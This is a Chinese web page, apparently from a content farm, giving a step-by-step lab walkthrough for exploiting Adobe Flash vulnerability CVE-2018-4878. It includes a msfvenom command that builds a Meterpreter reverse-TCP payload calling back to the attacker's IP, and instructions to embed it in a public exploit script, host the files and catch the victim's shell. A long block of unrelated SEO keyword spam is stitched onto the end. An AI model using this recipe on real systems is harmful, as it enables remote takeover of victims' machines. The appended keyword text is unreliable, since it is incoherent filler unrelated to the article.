千家信息网

Adobe flash player 28漏洞攻击的分析

发表于:2024-12-12 作者:千家信息网编辑
千家信息网最后更新 2024年12月12日,Adobe flash player 28漏洞攻击的分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。Adobe Flash 28.0.
千家信息网最后更新 2024年12月12日Adobe flash player 28漏洞攻击的分析

Adobe flash player 28漏洞攻击的分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会触发漏洞,可直接getshell。准备工作:靶机信息:192.168.2.134(windows 7 SP1)Flash版本:28.0.0.137攻击机信息:192.168.2.132(kali linux)漏洞利用脚本:CVE-2018-4878-master漏洞利用:

1.使用msfvenom生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。

2.替换原 cve-2018-4878.py中的shellcode,并修改参数stageless=False。

3.在代码中修改要生成的文件和路径。

4.执行修改后的cve-2018-4878.py文件,生成index和exploit两个文件。

5.将生成的两个文件复制到web目录环境下。

6.在kali的msf中启用监听。

7.在win7主机中使用含漏洞的浏览器和Adobe Flash访问http://192.168.2.132/index.html,kali中即可获取到靶机会话。

看完上述内容,你们掌握Adobe flash player 28漏洞攻击的分析的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!

漏洞 攻击 文件 生成 分析 两个 信息 内容 方法 更多 浏览器 版本 链接 问题 靶机 浏览 特殊 束手无策 为此 主机 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 怎么查看服务器的管理口ip 软件开发笔记本4K屏 创欧网络技术有限公司 浙江省天气预报软件开发 三国杀全武将数据库 如何用数据库查看系统 c 用于什么软件开发 五家渠新湖互联网科技有哪些 南昌软件开发中心 服务器连接器种类 公安部网络安全局刘伟 成都大学网络安全学院怎么样 自己搭建游戏服务器 服务器打开远程桌面连接 超级小盘10亿网络安全股 方舟生存进化在服务器里成为服霸 计算机网络技术所属行业 网络安全离我们并不遥远 互联网科技巨头去金融化 对象存储和应用服务器如何 软件开发培训学校住建 公安部关于网络安全保卫工作会议 网信体系 产业基础 网络安全 什么是电子邮件服务器 阿里云服务器安全补丁修复 为什么数据库表格不能显示 项目部网络安全自查报告 gta无法连接服务器 中华医期刊全文数据库官方网站 国内时钟服务器地址
0